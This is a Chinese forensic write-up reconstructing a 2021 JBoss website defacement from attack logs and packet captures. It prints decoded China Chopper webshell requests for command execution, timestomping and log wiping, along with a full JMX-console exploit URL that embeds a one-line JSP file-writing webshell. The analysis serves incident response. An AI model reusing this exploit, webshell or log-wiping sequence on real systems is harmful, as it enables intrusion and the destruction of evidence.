背景概述
2021年6月,某单位系统关键图片被篡改,网站疑似遭到入侵。
获取信息
从安全感知系统中导出近两天攻击行为日志,经分析处理共计1097条。
从全流量系统中导出遭受攻击当天流量包,经分析处理共计101,801,984字节(97MB)数据包。
入侵过程还原
由于图片被篡改,访问网页复制图片链接查看图片文件名。然后思考篡改图片大致流程为先下载图片,然后P图加上水印,然后再上传替换服务器上的图片。从攻击行为日志中检索图片文件名"logo.gif",得到如下两条日志。可获知/August/August.jsp操作了这张图。(有经验的大佬可能通过这两行日志就已经看出来August.jsp是菜刀马了)
攻击者尝试攻击:x.x.x.x:9090/August/August.jsp,攻击代码为:a=F&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif
接下来从流量中检索 August.jsp,第一次出现的位置前后数据包可能存在上传马的数据包,使用wireshark打开数据包检索http contains "August.jsp" 得到源目的IP,做进一步检索,查看第一条追踪http流。
URL解码后得到 August.jsp 文件内容。(显然,August.jsp为菜刀马)
过滤 http.request.method=="POST" and http.request.uri =="/August/August.jsp",根据流量中请求的POST参数一步一步还原攻击全过程。提取出请求如下:(很多环境中没有记录全流量,可以从能记录post参数的安全设备中导出,如WAF)
要理解这些参数对应的操作,需分析菜刀马。粗略分析,参数中的a=B中的a是菜刀马的密码,B则会调用菜刀马中的BB函数,a=M则意味着会调用菜刀马的MM函数,以此类推。接下来分析菜刀马的所有XX函数执行什么操作,分析整理如下:
a=A //列出根目录
分析完菜刀马,我们就能很容易地通过流量中对马的请求参数来还原出攻击步骤,中间若干浏览目录的操作已省略。
请求参数
分析结果
a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bid%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D
执行命令[id]
a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bnetstat+-ano%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D
执行命令[netstat -ano]
a=H&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2FAugust.jsp&z2=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2FAugust.jsp
复制文件/usr/local/jboss/server/default/./deploy/management/August.war/August.jsp到/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war/August.jsp
a=I&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2FAugust.jsp&z2=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2Ftest.jsp
将/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war/August.jsp重命名为test.jsp
a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2Ftest.jsp&z2=2008-07-19+02%3A21%3A04
将/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war/test.jsp的最后修改时间改为2008-07-19 02:21:04
a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war&z2=2008-07-19+02%3A22%3A10
将/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war的最后修改时间改为2008-07-19 02:22:10
a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war&z2=2021-06-25+16%3A10%3A58
将/usr/local/jboss/server/default/./deploy/management/August.war的最后修改时间改为2021-06-25 16:10:58
a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2FAugust.jsp&z2=2021-06-25+16%3A10%3A58
将/usr/local/jboss/server/default/./deploy/management/August.war/August.jsp的最后修改时间改为2021-06-25 16:10:58
a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2Fshell.jsp&z2=2021-06-25+16%3A10%3A58
将/usr/local/jboss/server/default/./deploy/management/August.war/shell.jsp的最后修改时间改为2021-06-25 16:10:58
a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bps+aux%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D
执行系统命令[ps aux]
a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log
读取/usr/local/jboss/server/default/./log/server.log
a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log&z2=1
将“1”写入/usr/local/jboss/server/default/./log/server.log
a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log.2021-06-20
读取/usr/local/jboss/server/default/./log/server.log.2021-06-20
a=F&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2FServerInfo.jsp
下载/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/ServerInfo.jsp
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2FServerInfo.jsp
删除/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/ServerInfo.jsp
a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Findex.html
读取/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/index.html
a=F&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif
下载/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/images/logo.gif
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif
删除/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/images/logo.gif
a=G&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif&z2=474946383961E8036900F7000000...
将16进制写入/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/images/logo.gif
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjmx-console.war
删除/usr/local/jboss/server/default/./deploy/jmx-console.war
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war
删除/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fjbossjdk.war
删除/usr/local/jboss/server/default/./deploy/management/jbossjdk.war
a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log
读取/usr/local/jboss/server/default/log/server.log
a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log
读取/usr/local/jboss/server/default/log/server.log
a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log&z2=122
将“122”写入/usr/local/jboss/server/default/log/server.log
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-20
删除/usr/local/jboss/server/default/log/server.log.2021-06-20
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-21
删除/usr/local/jboss/server/default/log/server.log.2021-06-21
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-22
删除/usr/local/jboss/server/default/log/server.log.2021-06-22
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-23
删除/usr/local/jboss/server/default/log/server.log.2021-06-23
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-24
删除/usr/local/jboss/server/default/log/server.log.2021-06-24
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-25
删除/usr/local/jboss/server/default/log/server.log.2021-06-25
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-26
删除/usr/local/jboss/server/default/log/server.log.2021-06-26
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-27
删除/usr/local/jboss/server/default/log/server.log.2021-06-27
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-28
删除/usr/local/jboss/server/default/log/server.log.2021-06-28
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fwork%2Fjboss.web%2Flocalhost%2Fjbossjdk
删除/usr/local/jboss/server/default/./work/jboss.web/localhost/jbossjdk
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fwork%2Fjboss.web%2Flocalhost%2F_
删除/usr/local/jboss/server/default/./work/jboss.web/localhost/_
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fwork%2Fjboss.web%2Flocalhost%2FAugust
删除/usr/local/jboss/server/default/./work/jboss.web/localhost/August
a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log
读取/usr/local/jboss/server/default/./log/server.log
a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log&z2=12
将“12”写入/usr/local/jboss/server/default/./log/server.log
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war
删除/usr/local/jboss/server/default/./deploy/management/August.war
看到到这里大家应该会知道有一个August.war存在过,然后shell.jsp在August目录下,那shell.jsp应该在这个war里面。那shell.jsp的内容是什么?
根据前面写August.jsp的请求包可以推测其功能就是写文件。我们也可以从流量中将其内容找出来。
wireshark中检索 http contains "August.war",查看第一条。
URL解码后:
/jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%+if(request.getParameter("f")!=null)(new+java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());+%>&argType=boolean&arg4=True
根据该url,Google查一下就知道攻击者这是利用的什么漏洞,其中arg3就是shell.jsp的内容。
至此,整个攻击的来龙去脉都理得清清楚楚,从什么漏洞进去,如何替换图片,然后删除webshell清除日志……
还原被篡改的文件
被篡改的源文件已被删除,可从流量中还原。根据之前分析的菜刀参数,查找的流量包可检索http contains "a=F" and http contains "logo.gif"到下载图片的数据包。
进一步检索http contains "->|GIF89a" and http.response,复制-> as a Hex Stream。
然后你可以将其粘贴到UE或者winHex等16进制编辑器。这里介绍另一种方法,粘贴到txt,删除2d3e7c(->|)及以前的内容和7c3c2d(|<-)及之后的内容。
使用如下代码转换成二进制文件:
import sys
使用pyinsyaller打包成exe就更方便了,将txt拖到exe上面即可转换生成二进制文件。
附录:菜刀马解析备注
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
InBug-实验室
InScan内网扫描器:https://github.com/inbug-team/InScan